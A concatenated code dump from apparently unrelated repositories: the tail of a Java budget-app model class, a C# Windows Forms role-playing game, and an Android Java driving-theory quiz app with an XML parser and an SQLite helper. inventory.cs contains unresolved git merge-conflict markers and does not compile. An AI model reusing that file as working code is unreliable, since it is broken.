return unit;
}
public void setUnit(String unit) {
this.unit = unit;
}
public Integer getCreatedDay() {
return createdDay;
}
public void setCreatedDay(Integer createdDay) {
this.createdDay = createdDay;
}
public Integer getCreatedMonth() {
return createdMonth;
}
public void setCreatedMonth(Integer createdMonth) {
this.createdMonth = createdMonth;
}
public Integer getCreatedYear() {
return createdYear;
}
public void setCreatedYear(Integer createdYear) {
this.createdYear = createdYear;
}
public Integer getDueDay() {
return dueDay;
}
public void setDueDay(Integer dueDay) {
this.dueDay = dueDay;
}
public Integer getDueMonth() {
return dueMonth;
}
public void setDueMonth(Integer dueMonth) {
this.dueMonth = dueMonth;
}
public Integer getDueYear() {
return dueYear;
}
public void setDueYear(Integer dueYear) {
this.dueYear = dueYear;
}
public String getPayment() {
return payment;
}
public void setPayment(String payment) {
this.payment = payment;
}
public String getDescription() {
return description;
}
public void setDescription(String description) {
this.description = description;
}
public boolean isReminder() {
return reminder;
}
public void setReminder(boolean reminder) {
this.reminder = reminder;
}
/**
 * Debug representation listing every field.
 * Fix: the label for {@code createdMonth} was previously misspelled
 * "creayedMonth" in the generated string.
 */
@Override
public String toString() {
    return "DebtDetails{" +
            "name='" + name + '\'' +
            ", category='" + category + '\'' +
            ", amount='" + amount + '\'' +
            ", unit='" + unit + '\'' +
            ", createdDay=" + createdDay +
            ", createdMonth=" + createdMonth +
            ", createdYear=" + createdYear +
            ", dueDay=" + dueDay +
            ", dueMonth=" + dueMonth +
            ", dueYear=" + dueYear +
            ", payment='" + payment + '\'' +
            ", description='" + description + '\'' +
            ", reminder=" + reminder +
            '}';
}
} | 231861873aa4921147f6ff1d5d281e2cf87edd2d | [
"Markdown",
"Java"
] | 8 | Java | CillerA/Android_BudgetManagementApp | 89d726f08e709f6fc2a07051ccc3e32a6a4a5f5f | 8b2f8e264cb974a442ccc319ab25562c8f7438f1 |
refs/heads/master | <repo_name>ilyuha1994/RoleGame<file_sep>/Квест/Квест/Globals.cs
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
using System.IO;
namespace Квест
{
    // Merge-conflict resolution: this file contained unresolved git conflict
    // markers (HEAD vs origin/master) and did not compile. The union of both
    // sides is kept: origin/master's fields and Save/Reader persistence plus
    // HEAD's resourse/Gun/MedResource helper classes.

    /// <summary>
    /// Global game state shared between all forms, plus save/load helpers.
    /// </summary>
    public class Globals
    {
        public static int Level = 1;   // player level
        public static int Heal = 5;    // health; clamped to 0..100 by resourse.func()
        public static int Medic = 3;   // number of first-aid kits
        public static int Points = 0;  // score; more than 100 points advances a level
        public static int Money = 0;
        public static int Ammo = 10;   // ammunition (HEAD branch value kept)
        public int[] param;

        /// <summary>
        /// Writes the global state to Save.txt, one value per line, in the
        /// order Level, Heal, Medic, Points, Money, Ammo.
        /// </summary>
        public void Save()
        {
            StreamWriter sw = new StreamWriter("Save.txt", false);
            sw.WriteLine(Globals.Level.ToString());
            sw.WriteLine(Globals.Heal.ToString());
            sw.WriteLine(Globals.Medic.ToString());
            sw.WriteLine(Globals.Points.ToString());
            sw.WriteLine(Globals.Money.ToString());
            sw.WriteLine(Globals.Ammo.ToString());
            sw.Close();
        }

        /// <summary>
        /// Reads the save file. NOTE(review): the original implementation
        /// reads two lines and discards them — actually restoring the values
        /// into the static fields is still TODO.
        /// </summary>
        public void Reader()
        {
            StreamReader read = new StreamReader("Save.txt");
            read.ReadLine();
            read.ReadLine();
            read.Close(); // fix: release the file handle (was never closed)
        }
    }

    /// <summary>Normalises the global resources after each update.</summary>
    class resourse
    {
        public void func()
        {
            if (Globals.Points > 100)
            {
                Globals.Level += 1;
                Globals.Points = 0;
            }
            if (Globals.Heal > 100)
            {
                Globals.Heal = 100;
            }
            if (Globals.Heal < 0)
                Globals.Heal = 0;
        }
    }

    /// <summary>Weapon inventory flags (1 = owned, 0 = not owned).</summary>
    public static class Gun
    {
        public static int PM = 1;
        public static int Beretta = 1;
        public static int Desert_Eagle = 1;
        public static int AKS_74Y = 0;
        public static int AK_105 = 0;
        public static int AH_94 = 0;
        public static int TOZ34 = 0;
        public static int ShotGun = 0;
        public static int Saiga_12 = 0;
        public static int Dragunov_sniper_rifle = 0;
        public static int Vintorez = 0;
        public static int Gaus_Gun = 0;
    }

    /// <summary>Medical consumable counters.</summary>
    public static class MedResource
    {
        public static int medicine = 3;  // first-aid kit
        public static int bandage = 0;   // bandage
        public static int analgesic = 0; // painkiller
        public static int antidote = 0;
    }
}
<file_sep>/Квест/Квест/inventory.cs
using System;
using System.Collections.Generic;
using System.ComponentModel;
using System.Data;
using System.Drawing;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
using System.Windows.Forms;
namespace Квест
{
public partial class inventory : Form
{
public inventory()
{
InitializeComponent();
}
private void medicine_Click(object sender, EventArgs e)
{
<<<<<<< HEAD
LabelHeal.Text = Globals.Heal.ToString();
LabelLevel.Text = Globals.Level.ToString();
LabelMoney.Text = Globals.Money.ToString();
if (MedResource.medicine <= 0)
{
MessageBox.Show("Нет аптечек!");
}
else
{
Globals.Heal += 60;
MedResource.medicine -= 1;
}
=======
if (Globals.Medic > 0)
{
Globals.Medic--;
Globals.Heal += 50;
if (Globals.Heal > 100)
Globals.Heal = 100;
}
>>>>>>> origin/master
}
private void inventory_Load(object sender, EventArgs e)
{
LabelHeal.Text = Globals.Heal.ToString();
LabelLevel.Text = Globals.Level.ToString();
LabelMoney.Text = Globals.Money.ToString();
}
private void button1_Click(object sender, EventArgs e)
{
FormVillage form2 = new FormVillage();
this.Hide();
form2.ShowDialog();
this.Hide();
}
<<<<<<< HEAD
private void PDAButton_Click(object sender, EventArgs e)
{
PDA form3 = new PDA();
this.Hide();
form3.ShowDialog();
this.Show();
}
=======
>>>>>>> origin/master
}
}
<file_sep>/Квест/Квест/Village.cs
using System;
using System.Collections.Generic;
using System.ComponentModel;
using System.Data;
using System.Drawing;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
using System.Windows.Forms;
namespace Квест
{
public partial class FormVillage : Form
{
public FormVillage()
{
InitializeComponent();
}
private void PDAButton_Click(object sender, EventArgs e)
{
PDA form3 = new PDA();
this.Hide();
form3.ShowDialog();
this.Show();
}
private void InventoryButton_Click(object sender, EventArgs e)
{
inventory form2 = new inventory();
this.Hide();
form2.ShowDialog();
//this.Show();
}
private void LabelHeal_Click(object sender, EventArgs e)
{
}
private void FormVillage_Load(object sender, EventArgs e)
{
if (Globals.Points > 100)
{
Globals.Level += 1;
Globals.Points = 0;
}
LabelHeal.Text = Globals.Heal.ToString();
LabelLevel.Text = Globals.Level.ToString();
LabelMoney.Text = Globals.Money.ToString();
}
private void button1_Click(object sender, EventArgs e)
{
FormBatleDogs form2 = new FormBatleDogs();
this.Hide();
form2.ShowDialog();
this.Show();
}
private void SaveButton_Click(object sender, EventArgs e)
{
Globals s = new Globals();
s.Save();
}
}
}
<file_sep>/Квест/Квест/Form1.cs
using System;
using System.Collections.Generic;
using System.ComponentModel;
using System.Data;
using System.Drawing;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
using System.Windows.Forms;
namespace Квест
{
public partial class FormIntro : Form
{
public FormIntro()
{
InitializeComponent();
}
private void button1_Click(object sender, EventArgs e)
{
Globals read = new Globals();
read.Reader();
FormVillage form2 = new FormVillage();
this.Hide();
form2.ShowDialog();
this.Close();
}
private void label1_Click(object sender, EventArgs e)
{
}
private void FormIntro_Load(object sender, EventArgs e)
{
}
}
}
<file_sep>/Квест/Квест/FormLossDogs.cs
using System;
using System.Collections.Generic;
using System.ComponentModel;
using System.Data;
using System.Drawing;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
using System.Windows.Forms;
namespace Квест
{
public partial class FormLossDogs : Form
{
public FormLossDogs()
{
InitializeComponent();
}
private void FormLossDogs_Load(object sender, EventArgs e)
{
if (Globals.Heal > 0)
label1.Text = "Собака вгрызлась Вам в плоть, но Вам удалось вырваться из ее когтей.";
else
label1.Text = "Вы погибли.";
}
}
} | 43d8f0f32d0644e797d977514f8ec21ed3a17754 | [
"C#"
] | 5 | C# | ilyuha1994/RoleGame | c25ba0e5037e916fffd79ebccbde3bd16d894db3 | ee1df2bbe52943fec5f63dfb83f0f29d57ffcc5e |
refs/heads/master | <repo_name>Shoaib3008757/XmlParsingTest<file_sep>/app/src/main/java/xmlparsingtest/ranglerz/com/xmlparsingtest/ReviewAnswers.java
package xmlparsingtest.ranglerz.com.xmlparsingtest;
import android.content.Intent;
import android.os.Bundle;
import android.support.design.widget.FloatingActionButton;
import android.support.design.widget.Snackbar;
import android.support.v7.app.AppCompatActivity;
import android.support.v7.widget.Toolbar;
import android.util.Log;
import android.view.View;
import android.view.ViewConfiguration;
import android.widget.AdapterView;
import android.widget.ListView;
import xmlparsingtest.ranglerz.com.xmlparsingtest.CustomAdapters.CustomAdapterReviewAnswers;
/**
 * Screen that lists the user's answers after a test. Tapping a row opens
 * {@link ShowAnswer} with that question's text/image, the user's chosen
 * answer and the correct answer.
 */
public class ReviewAnswers extends AppCompatActivity {
    ListView reviewAnswers ;
    CustomAdapterReviewAnswers customAdapterReviewAnswers;
    // Test result object passed in via the "object" intent extra.
    UserChoiceTakeTest userChoiceTakeTest;
    String userAnswerChoice = null;
    String correctAnswer = null;
    String correctImage = null;
    String questionImage = null;
    int questionNumber = 0;
    public static final String TAG ="Review Answers";
    // Friction multiplier used to slow down list fling scrolling.
    public static final int SCROLLING_FACTOR = 32;
    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        setContentView(R.layout.activity_review_answers);
        userChoiceTakeTest = (UserChoiceTakeTest) getIntent().getSerializableExtra("object");
        Log.d(TAG,"Total Correct Answer is "+userChoiceTakeTest.numberOfCorrectAnswers);
        reviewAnswers = (ListView) findViewById(R.id.listViewReviewAnswers);
        customAdapterReviewAnswers = new CustomAdapterReviewAnswers(getApplicationContext(),R.layout.single_item_listview,userChoiceTakeTest);
        reviewAnswers.setAdapter(customAdapterReviewAnswers);
        // make listview scroll to slow down
        reviewAnswers.setFriction(ViewConfiguration.getScrollFriction() * SCROLLING_FACTOR);
        reviewAnswers.setOnItemClickListener(new AdapterView.OnItemClickListener() {
            @Override
            public void onItemClick(AdapterView<?> parent, View view, int position, long id) {
                // NOTE(review): assumes Splash.randomQuestions and the adapter
                // list are in the same order/size — confirm against TakeTest flow.
                correctAnswer = Splash.randomQuestions.get(position).getCorrectAnswer().toString().trim();
                correctImage = Splash.randomQuestions.get(position).getCorrectImage().toString().trim();
                questionImage = Splash.randomQuestions.get(position).getQuestionImage().toString().trim();
                userAnswerChoice = userChoiceTakeTest.selectedAnswerText.get(position).toString().trim();
                // Question numbers shown to the user are 1-based.
                questionNumber = position +1;
                Log.d(TAG," Correct Answer is "+correctAnswer+" User Answer is "+userAnswerChoice +"Question number is "+questionNumber);
                // make a new activity to display the current question with user choice answer and also it's correct answer
                Intent i = new Intent(ReviewAnswers.this,ShowAnswer.class);
                i.putExtra("correctAnswer",correctAnswer);
                i.putExtra("correctImage",correctImage);
                i.putExtra("userAnswerChoice",userAnswerChoice);
                i.putExtra("position",position);
                i.putExtra("questionNumber",questionNumber);
                i.putExtra("questionImage",questionImage);
                startActivity(i);
            }
        });
    }
}
<file_sep>/app/src/main/java/xmlparsingtest/ranglerz/com/xmlparsingtest/EntityClasses/Category.java
package xmlparsingtest.ranglerz.com.xmlparsingtest.EntityClasses;
import android.os.Parcel;
import android.os.Parcelable;
import java.io.Serializable;
/**
* Created by User-10 on 20-Oct-16.
*/
/**
 * A selectable quiz category: its label, checked state and position in the
 * picker list. Serializable so it can be passed between activities.
 */
public class Category implements Serializable{

    // Category label shown to the user.
    String name;
    // Whether the row is currently ticked.
    boolean isSelected;
    // Row position inside the adapter's data set.
    int position;

    /**
     * @param name  category label
     * @param value initial checked state
     */
    public Category(String name , boolean value)
    {
        this.name = name ;
        this.isSelected = value;
    }

    public String getName() {
        return name;
    }

    public void setName(String name) {
        this.name = name;
    }

    public boolean isSelected() {
        return isSelected;
    }

    public void setIsSelected(boolean isSelected) {
        this.isSelected = isSelected;
    }

    public int getPosition() {
        return position;
    }

    public void setPosition(int position) {
        this.position = position;
    }
}
<file_sep>/app/src/main/java/xmlparsingtest/ranglerz/com/xmlparsingtest/XmlHandler.java
package xmlparsingtest.ranglerz.com.xmlparsingtest;
import android.util.Log;
import android.widget.ListView;
import android.widget.Switch;
import org.xmlpull.v1.XmlPullParser;
import org.xmlpull.v1.XmlPullParserException;
import java.io.IOException;
import java.util.ArrayList;
import java.util.List;
import xmlparsingtest.ranglerz.com.xmlparsingtest.EntityClasses.Answer;
import xmlparsingtest.ranglerz.com.xmlparsingtest.EntityClasses.Question;
/**
* Created by User-10 on 01-Aug-16.
*/
/**
 * Pull-parser for the question XML files. Walks the document event by event,
 * building {@link Question}/{@link Answer} objects and inserting them into
 * the database via {@code Splash.dbHelperClass} as each closing tag is seen.
 *
 * Expected structure (from the handling below): a {@code <QF>} root with
 * {@code id}/{@code topic} attributes, containing {@code <question>},
 * {@code <explanation>}, {@code <part>} (case studies only), {@code <answer
 * correct="yes|no">} and nested {@code <graphic>}/{@code <text>} elements.
 */
public class XmlHandler {
    // tags for xml
    /**
     * Parses one XML file and persists its questions and answers.
     *
     * @param xmlPullParser parser already positioned at the document start
     * @return the last {@link QuestionAnswer} built, or null if none was seen
     *
     * NOTE(review): {@code text} is only overwritten on TEXT events and never
     * cleared, so END_TAG handlers (e.g. for "graphic") may observe the text
     * of an earlier element — the null/empty guards below only partly cover
     * this. Confirm against the XML files' actual shape.
     */
    public QuestionAnswer ParseAndStoreXML(XmlPullParser xmlPullParser) throws XmlPullParserException {
        int event = 0;
        String text= null;
        event = xmlPullParser.getEventType();
        // TODO: booleans to check if the parser is in specific tag or not..
        boolean inQuestionTag = false;
        boolean inAnswerTag = false;
        boolean isCorrectAnswer = false;
        boolean inGraphicTag = false;
        boolean inGraphicTagQuestion = false;
        boolean inExplainationTag = false;
        // this tag only found in caseStudy Files...
        boolean inPartTag = false;
        // object for store data
        QuestionAnswer questionAnswer = null;
        Answer answer = null;
        Question question = null;
        // get last inserted question id
        long lastInsertedQuestionId = 0;
        try{
            while (event != XmlPullParser.END_DOCUMENT)
            {
                String name = xmlPullParser.getName();
                // Log.d("tag","Name is "+name);
                switch(event)
                {
                    case XmlPullParser.START_DOCUMENT:
                        break;
                    case XmlPullParser.TEXT:
                        // Remember the most recent character data; it is
                        // consumed by the END_TAG handlers below.
                        // Log.d("tag","Text Is called");
                        text = xmlPullParser.getText();
                        break;
                    case XmlPullParser.START_TAG:
                        if(name.equalsIgnoreCase("QF"))
                        {
                            // creates a new instance of the Class
                            // because a new Question is started
                            questionAnswer = new QuestionAnswer();
                            question = new Question();
                            Log.d("tag","Questions is Started");
                            question.setQuestionId(xmlPullParser.getAttributeValue(null,"id"));
                            question.setTopic(xmlPullParser.getAttributeValue(null,"topic"));
                            questionAnswer.category = xmlPullParser.getAttributeValue(null,"topic");
                            Log.d("tag","Category is "+question.getTopic());
                        }
                        else if(name.equalsIgnoreCase("question")) {
                            inQuestionTag = true;
                        }
                        else if(name.equalsIgnoreCase("explanation")) {
                            inExplainationTag = true;
                            // because we read the question text now we only want to read ExplanationText..
                            inQuestionTag = false;
                        }
                        else if(name.equalsIgnoreCase("part")) {
                            inExplainationTag = false;
                            // because we read the question text now we only want to read ExplanationText..
                            inQuestionTag = false;
                            inPartTag = true;
                        }
                        else if(name.equalsIgnoreCase("answer"))
                        {
                            answer = new Answer();
                            inAnswerTag = true;
                            // The "correct" attribute marks the right option.
                            String correctAnswer = xmlPullParser.getAttributeValue(null,"correct");
                            if(correctAnswer.equals("yes"))
                            {
                                isCorrectAnswer = true;
                            }
                        }
                        else if(name.equalsIgnoreCase("graphic"))
                        {
                            // A graphic may belong either to the question or
                            // to the answer currently being read.
                            if(inQuestionTag)
                                inGraphicTagQuestion = true;
                            if(inAnswerTag)
                                inGraphicTag = true;
                        }
                        break;
                    case XmlPullParser.END_TAG:
                        if(name.equalsIgnoreCase("QF"))
                        {
                            // add object to the list
                            // questionAnswers.add(questionAnswer);
                            Log.d("tag","Questions is End");
                            // Log.d("tag","Size of List is "+questionAnswers.size());
                        }
                        else if(name.equalsIgnoreCase("explanation"))
                        {
                            inExplainationTag = false;
                        }
                        else if(name.equalsIgnoreCase("part"))
                        {
                            // Case-study files carry the explanation inside <part>.
                            if(inPartTag)
                            {
                                question.setQuestionExplaination(text);
                                Log.d("tag","explaiantion text is"+text.toString().trim());
                            }
                            inPartTag = false;
                        }
                        else if(name.equals("text"))
                        {
                            // Route the buffered character data to whichever
                            // element we are currently inside.
                            if(inQuestionTag) {
                                String questionText = text;
                                question.setQuestionText(questionText);
                                questionAnswer.setQuestionText(questionText);
                                Log.d("tag", "Question is " + questionAnswer.getQuestionText());
                            }
                            if(inExplainationTag)
                            {
                                question.setQuestionExplaination(text);
                                Log.d("tag","explaiantion text is"+text.toString().trim());
                            }
                            if(inAnswerTag)
                            {
                                // to get the answer
                                String answerText = text;
                                answer.setAnswerText(answerText);
                                questionAnswer.setAnswerText(answerText);
                                Log.d("tag","Answer is "+questionAnswer.getAnswerText());
                                //
                            }
                            if(isCorrectAnswer)
                            {
                                // to get the correct answer
                                String correctAnswer = text;
                                // set the correct answer
                                answer.setCorrectAnswer(correctAnswer);
                                questionAnswer.setCorrectAnswer(correctAnswer);
                                Log.d("tag"," Correct Answer is "+questionAnswer.getCorrectAnswer());
                            }
                        }
                        else if(name.equalsIgnoreCase("question")) {
                            // add question object to list
                            inQuestionTag = false;
                            inGraphicTagQuestion = false;
                            Splash.questionList.add(question);
                            // Persist the finished question (favourite flag starts at 0).
                            lastInsertedQuestionId = Splash.dbHelperClass.insertQuestions(question.getQuestionId(),question.getTopic(), question.getQuestionText(),0,question.getQuestionImage(),question.getQuestionExplaination());
                        }
                        else if(name.equalsIgnoreCase("graphic"))
                        {
                            if(inQuestionTag)
                                if(inGraphicTagQuestion)
                                {
                                    if(text != null && !text.isEmpty()) {
                                        Log.d("tag", "ParseAndStoreXML: In Question Graphic tag graphic name is " + text);
                                        question.setQuestionImage(text);
                                    }
                                }
                            if(inAnswerTag)
                                if(inGraphicTag)
                                {
                                    Log.d("tag"," Is in Graphic tag ");
                                    if(text != null && !text.isEmpty())
                                    {
                                        if(isCorrectAnswer)
                                        {
                                            answer.setCorrectImage(text);
                                        }
                                        answer.setImageName(text);
                                        Log.d("tag", "Image is " + answer.getImageName());
                                    }
                                }
                            // because we have multiple answer and multiple images..
                            inGraphicTag = false;
                        }
                        else if(name.equalsIgnoreCase("answer"))
                        {
                            inAnswerTag = false;
                            isCorrectAnswer = false;
                            Splash.answerList.add(answer);
                            // Persist the finished answer, linked by question id.
                            Splash.dbHelperClass.insertAnswers(answer.getAnswerText(),answer.getCorrectAnswer(),question.getQuestionId(),answer.getImageName(),answer.getCorrectImage());
                        }
                        else if(name.equalsIgnoreCase("answers"))
                        {
                            // Log.d("tag","All Answers End");
                        }
                        break;
                }
                event = xmlPullParser.next();
            }
        } catch (XmlPullParserException e) {
            e.printStackTrace();
        } catch (IOException e) {
            e.printStackTrace();
        }
        return questionAnswer;
    }
}
<file_sep>/app/src/main/assets/Incidents, Accidents and Emergencies/desktop.ini
[LocalizedFileNames]
AB2855.xml=@AB2855,0
<file_sep>/app/src/main/assets/Vehicle Handling/desktop.ini
[LocalizedFileNames]
BB1749.xml=@BB1749,0
<file_sep>/app/src/main/java/xmlparsingtest/ranglerz/com/xmlparsingtest/QuestionAnswer.java
package xmlparsingtest.ranglerz.com.xmlparsingtest;
/**
* Created by User-10 on 03-Oct-16.
*/
/**
 * Flat holder for one parsed question: its topic, question text, the answer
 * option most recently read and the correct answer.
 */
public class QuestionAnswer {

    public String category;
    public String questionText;
    public String answerText;
    public String correctAnswer;

    public String getCategory() {
        return category;
    }

    public void setCategory(String category) {
        this.category = category;
    }

    public String getQuestionText() {
        return questionText;
    }

    public void setQuestionText(String questionText) {
        this.questionText = questionText;
    }

    public String getAnswerText() {
        return answerText;
    }

    public void setAnswerText(String answerText) {
        this.answerText = answerText;
    }

    public String getCorrectAnswer() {
        return correctAnswer;
    }

    public void setCorrectAnswer(String correctAnswer) {
        this.correctAnswer = correctAnswer;
    }
}
<file_sep>/app/src/main/java/xmlparsingtest/ranglerz/com/xmlparsingtest/DBHelperClass.java
package xmlparsingtest.ranglerz.com.xmlparsingtest;
import android.content.ContentValues;
import android.content.Context;
import android.database.Cursor;
import android.database.sqlite.SQLiteDatabase;
import android.database.sqlite.SQLiteOpenHelper;
import android.util.Log;
import java.util.ArrayList;
import java.util.List;
import xmlparsingtest.ranglerz.com.xmlparsingtest.EntityClasses.Category;
/**
* Created by User-10 on 04-Oct-16.
*/
/**
 * SQLite helper for the quiz database. Creates the schema (users, tests,
 * questions, answers plus two many-to-many bridge tables) and provides
 * insert/query helpers used by the rest of the app.
 *
 * Fixes relative to the previous revision:
 *  - {@link #U_PASSWORD} held a redaction placeholder ("&lt;PASSWORD&gt;")
 *    that would have produced invalid SQL in CREATE TABLE; reconstructed
 *    from the surrounding uXxx column-naming pattern.
 *  - {@link #insertQuestions} had an if/else that returned the same value
 *    on both branches.
 *  - {@link #isTableContainsData} leaked its Cursor.
 */
public class DBHelperClass extends SQLiteOpenHelper {

    // Database Version change when the changes in Database
    // Always change number when changes in database otherwise changes will not occur
    public static final int DATABASE_VERSION = 44;
    // Database Name
    public static final String DATABASE_NAME = "abel.sqlite";

    // table names
    public static final String TABLE_USERS = "users";
    public static final String TABLE_USER_TEST = "user_test"; // bridge table for many to many relationship
    public static final String TABLE_TESTS = "tests";
    public static final String TABLE_TEST_QUESTIONS = "test_question";
    public static final String TABLE_QUESTIONS = "questions";
    public static final String TABLE_ANSWERS = "answers";
    // NOTE(review): no CREATE TABLE exists for this table, yet onUpgrade
    // drops it — confirm whether it is created elsewhere or is dead code.
    public static final String TABLE_PROGRESS = "progress";

    // User Table Columns names
    public static final String U_ID = "uId";
    public static final String U_NAME = "uName";
    public static final String U_PASSWORD = "uPassword";
    public static final String U_EMAIL = "uEmail";
    public static final String U_CONTACT_NO = "uContactNo";
    public static final String U_ADDRESS = "uAddress";

    // User_test Table Columns names
    public static final String U_T_ID = "id";

    // Test Table Columns names
    public static final String T_ID = "tId";
    public static final String T_TYPE = "tType";
    public static final String T_COMPLETE = "tComplete";
    public static final String T_PASS = "tPass";
    public static final String T_DATE = "tDate";
    public static final String T_ISVISIBLE = "isVisible";
    public static final String T_CORRECTANSWERS = "totalCorrectAnswers";
    public static final String T_WRONANSWERS = "totalWrongAnswers";

    // Test_question Table Columns names
    public static final String T_Q_ID = "id";

    // Questions Table Columns names
    public static final String Q_ID = "qId";
    public static final String Q_TOPIC = "qTopic";
    public static final String Q_TEXT = "qText";
    public static final String Q_FAVOURITE = "qFavourite";
    public static final String Q_IMAGE = "qImage";
    public static final String Q_EXPLANATIION = "qExplaination";

    // Answers Table Columns names
    public static final String A_ID = "aId";
    public static final String A_TEXT = "aText";
    public static final String CORRECT_ANSWER = "correctAnswer";
    public static final String IMAGENAME = "imageName";
    public static final String CORRECT_IMAGE = "correctImage";

    // variables to store last inserted id for the row
    long last_inserted_id_question;
    long last_inserted_id_answer;

    public DBHelperClass(Context context ) {
        super(context, DATABASE_NAME, null, DATABASE_VERSION);
        Log.d("tag", "Construtor call of db helper class");
    }

    /** Creates the full schema on first open. */
    @Override
    public void onCreate(SQLiteDatabase db) {
        Log.d("tag","on Create Call of DB HELPER CLASS");
        // NOTE(review): this PRAGMA only applies to the current connection;
        // onConfigure()/setForeignKeyConstraintsEnabled() is the usual place — confirm.
        db.execSQL("PRAGMA foreign_keys = ON;");
        String CREATE_USERS_TABLE = "CREATE TABLE " + TABLE_USERS + "("
                + U_ID + " INTEGER PRIMARY KEY AUTOINCREMENT," + U_NAME + " TEXT," + U_PASSWORD + " TEXT," + U_EMAIL + " TEXT,"
                + U_CONTACT_NO + " INTEGER," + U_ADDRESS + " TEXT" + ")";
        String CREATE_USERS_TEST_TABLE = "CREATE TABLE " + TABLE_USER_TEST + "("
                + U_T_ID + " INTEGER PRIMARY KEY AUTOINCREMENT," + U_ID + " INTEGER ," + T_ID + " INTEGER,"
                + " FOREIGN KEY (" + U_ID + ") REFERENCES " + TABLE_USERS + "(" + U_ID + "),"
                + " FOREIGN KEY (" + T_ID + ") REFERENCES " + TABLE_TESTS + "(" + T_ID + "))";
        String CREATE_TESTS_TABLE = "CREATE TABLE " + TABLE_TESTS + "("
                + T_ID + " INTEGER PRIMARY KEY AUTOINCREMENT,"
                + T_TYPE + " TEXT,"
                + T_COMPLETE + " TEXT,"
                + T_PASS + " TEXT,"
                + T_DATE + " TEXT,"
                + T_ISVISIBLE + " TEXT,"
                + T_CORRECTANSWERS + " TEXT,"
                + T_WRONANSWERS + " TEXT )";
        String CREATE_TEST_QUESTIONS_TABLE = "CREATE TABLE " + TABLE_TEST_QUESTIONS + "("
                + T_Q_ID + " INTEGER PRIMARY KEY AUTOINCREMENT," + T_ID + " INTEGER ," + Q_ID + " TEXT,"
                + " FOREIGN KEY (" + T_ID + ") REFERENCES " + TABLE_TESTS + "(" + T_ID + "),"
                + " FOREIGN KEY (" + Q_ID + ") REFERENCES " + TABLE_QUESTIONS + "(" + Q_ID + "))";
        String CREATE_QUESTIONS_TABLE = "CREATE TABLE " + TABLE_QUESTIONS + "("
                + Q_ID + " TEXT PRIMARY KEY ,"
                + Q_TOPIC + " TEXT,"
                + Q_TEXT + " TEXT,"
                + Q_FAVOURITE + " TEXT,"
                + Q_IMAGE + " TEXT ,"
                + Q_EXPLANATIION + " TEXT"
                + ")";
        String CREATE_ANSWERS_TABLE = "CREATE TABLE " + TABLE_ANSWERS + "("
                + A_ID + " INTEGER PRIMARY KEY AUTOINCREMENT," + A_TEXT + " TEXT NOT NULL ," + CORRECT_ANSWER + " TEXT," + Q_ID + " TEXT,"
                + IMAGENAME + " TEXT," + CORRECT_IMAGE + " TEXT,"
                + " FOREIGN KEY (" + Q_ID + ") REFERENCES " + TABLE_QUESTIONS + "(" + Q_ID + "))";
        // here we execute the query for create tables
        db.execSQL(CREATE_USERS_TABLE);
        db.execSQL(CREATE_USERS_TEST_TABLE);
        db.execSQL(CREATE_TESTS_TABLE);
        db.execSQL(CREATE_TEST_QUESTIONS_TABLE);
        db.execSQL(CREATE_QUESTIONS_TABLE);
        db.execSQL(CREATE_ANSWERS_TABLE);
    }

    /** Destructive upgrade: drops everything and recreates the schema. */
    @Override
    public void onUpgrade(SQLiteDatabase db, int oldVersion, int newVersion) {
        Log.d("tag", "OnUpgrade Call");
        // Drop older table if existed
        db.execSQL("DROP TABLE IF EXISTS " + TABLE_USERS);
        db.execSQL("DROP TABLE IF EXISTS " + TABLE_USER_TEST);
        db.execSQL("DROP TABLE IF EXISTS " + TABLE_TESTS);
        db.execSQL("DROP TABLE IF EXISTS " + TABLE_TEST_QUESTIONS);
        db.execSQL("DROP TABLE IF EXISTS " + TABLE_QUESTIONS);
        db.execSQL("DROP TABLE IF EXISTS " + TABLE_ANSWERS);
        db.execSQL("DROP TABLE IF EXISTS " + TABLE_PROGRESS);
        // Create tables again
        onCreate(db);
    }

    /**
     * Inserts one question row.
     *
     * @return the row id of the inserted row, or -1 if the insert failed
     *         (insert() already encodes failure as -1, so the old if/else
     *         that returned the same value on both branches was removed)
     */
    public long insertQuestions(String questionId , String questionTopic, String questionText, int favourite,String imageName,String explanation) {
        SQLiteDatabase db = getWritableDatabase();
        ContentValues value = new ContentValues();
        value.put(Q_ID, questionId);
        value.put(Q_TOPIC, questionTopic);
        value.put(Q_TEXT, questionText);
        value.put(Q_FAVOURITE, favourite);
        value.put(Q_IMAGE, imageName);
        value.put(Q_EXPLANATIION, explanation);
        last_inserted_id_question = db.insert(TABLE_QUESTIONS, null, value);
        return last_inserted_id_question;
    }

    /**
     * Inserts one answer row linked to a question.
     *
     * @return true if the row was inserted, false if insert() failed
     */
    public boolean insertAnswers(String answerText, String correctAnswer, String questionId , String imageName, String correctImage) {
        SQLiteDatabase db = getWritableDatabase();
        ContentValues value = new ContentValues();
        value.put(A_TEXT, answerText);
        value.put(CORRECT_ANSWER, correctAnswer);
        value.put(Q_ID, questionId);
        value.put(IMAGENAME, imageName);
        value.put(CORRECT_IMAGE, correctImage);
        last_inserted_id_answer = db.insert(TABLE_ANSWERS, null, value);
        if (last_inserted_id_answer == -1)
            return false;
        else
            return true;
    }

    /**
     * Marks a question as favourite (qFavourite = 1).
     *
     * @return true if at least one row was updated
     */
    public boolean insertFavouriteQuestion(String questionId)
    {
        SQLiteDatabase db = getWritableDatabase();
        ContentValues value = new ContentValues();
        value.put(Q_FAVOURITE, 1);
        int rowsUpdated = db.update(TABLE_QUESTIONS,value,"qId = ?",new String[]{ String.valueOf(questionId) });
        Log.d("tag","rows Updated"+rowsUpdated);
        if(rowsUpdated == 0)
            return false;
        else
            return true;
    }

    /**
     * Records one test result row.
     *
     * @return true if the row was inserted, false if insert() failed
     */
    public boolean insertTestRecord(String testType, String testComplete, String testPass , String testDate, String isVisible , String totalCorrectAnswers , String totalWrongAnswers) {
        SQLiteDatabase db = getWritableDatabase();
        ContentValues value = new ContentValues();
        value.put(T_TYPE, testType);
        value.put(T_COMPLETE, testComplete);
        value.put(T_PASS, testPass);
        value.put(T_DATE, testDate);
        value.put(T_ISVISIBLE, isVisible);
        value.put(T_CORRECTANSWERS, totalCorrectAnswers);
        value.put(T_WRONANSWERS, totalWrongAnswers);
        last_inserted_id_answer = db.insert(TABLE_TESTS, null, value);
        if (last_inserted_id_answer == -1)
            return false;
        else
            return true;
    }

    /** Returns up to 50 random non-case-study questions; caller closes the cursor. */
